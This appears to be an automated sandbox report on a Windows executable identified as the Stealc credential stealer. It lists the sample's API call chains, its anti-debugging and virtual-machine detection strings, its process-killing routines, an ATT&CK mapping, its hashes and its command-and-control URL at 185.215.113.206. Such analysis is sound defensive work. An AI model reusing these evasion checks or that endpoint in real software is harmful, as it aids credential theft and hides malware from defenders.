              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B1E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B11269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B11269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B11250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B11250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B12390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_00B12390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B0DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B0DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B0DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B0DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B1CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B14B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B14B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B14B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B14B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_00B1DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B1D530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B016A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B21BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,1_2_00B21BF0
              Source: file.exe, file.exe, 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000001.00000002.1383935885.00000000018A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
              Source: file.exe, 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000001.00000002.1383935885.00000000018D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25653
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25661
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25506
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25524
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25674
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25550
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B04A60 VirtualProtect 00000000,00000004,00000100,? 1_2_00B04A60
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B26390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00B26390
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B26390 mov eax, dword ptr fs:[00000030h] 1_2_00B26390
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B22AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,1_2_00B22AD0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7408, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B246A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_00B246A0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B24610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_00B24610
Source: file.exe, file.exe, 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: FDProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00B22D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B21B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,1_2_00B21B20
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B22A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00B22A40
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B22C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00B22C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1342030048.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7408, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1342030048.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7408, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix (one line per tactic; a leading number is the report's badge for that technique, kept as shown)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 13 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Create Account; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 39% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.phpft | 100% | Avira URL Cloud | malware
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpft | file.exe, 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php8 | file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phph | file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1560054
                          Start date and time:2024-11-21 11:02:10 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 55s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 123
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                          • VT rate limit hit for: file.exe
                          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/68b591d6548ec281/sqlite3.dll
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
                          No context
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.945634053284836
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'789'952 bytes
                          MD5:88d9a99ca46e751ab8202680c23046f3
                          SHA1:dcba4b2d61dc2e695d2f0d6c4e4011cfd66d547f
                          SHA256:16503ad13cedbcd3a80af81e25a871ef01ca4606fa2e61f3960924fd2c000ee4
                          SHA512:0ac42f6dbabc574024472697b42d9d38c14230e69a5e434fb97e1c3c95b58d5d4fe593965812dd209b2414167662377006b1562033acf5d9b6d6bba5c7cc1ff3
                          SSDEEP:49152:N9QJ8SRmZEblDMUePc0eTM0QoEzH934Ma18:bQ2SRkE9cIwNo
                          TLSH:4D853362DC93B6A8DDB7853431763E802BA05CE07C134EC4B2D197B78AFB6256B15873
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0xa8b000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point, RVA 0x68b000 in .taggant)
jmp 00007F6E38B874AAh
ucomiss xmm3, dqword ptr [ebx]
add byte ptr [eax], al (x2)
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al (x3)
xor byte ptr [eax], al
add byte ptr [eax], al (x3)
inc eax
add byte ptr [eax], al (x7)
add byte ptr [edx+ecx], al
add byte ptr [eax], al (x63)
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al (x2)
adc byte ptr [eax], al
add byte ptr [eax], al (x3)
add al, 0Ah
add byte ptr [eax], al (x3)
Only the leading jmp is code. Everything after it is the disassembler decoding non-code bytes (add byte ptr [eax], al is the encoding of two 0x00 bytes), so the entry stub transfers control out of this region immediately.
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Two entries are worth noting: the IAT directory is empty although an import directory exists, and the base-relocation directory is only 8 bytes although DYNAMIC_BASE is set (the process below nevertheless ran at image base 0xb00000, not the header's 0x400000). Both are consistent with a stub that resolves imports and handles relocation itself at run time.
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x249000 | 0x16200 | 73b5bd07d4f42424cecfcc9ff0fc6e0c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x1ac | 0x200 | 6744c47571063080f8eee01066a2a873 | False | 0.58203125 | data | 4.543360183803996 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
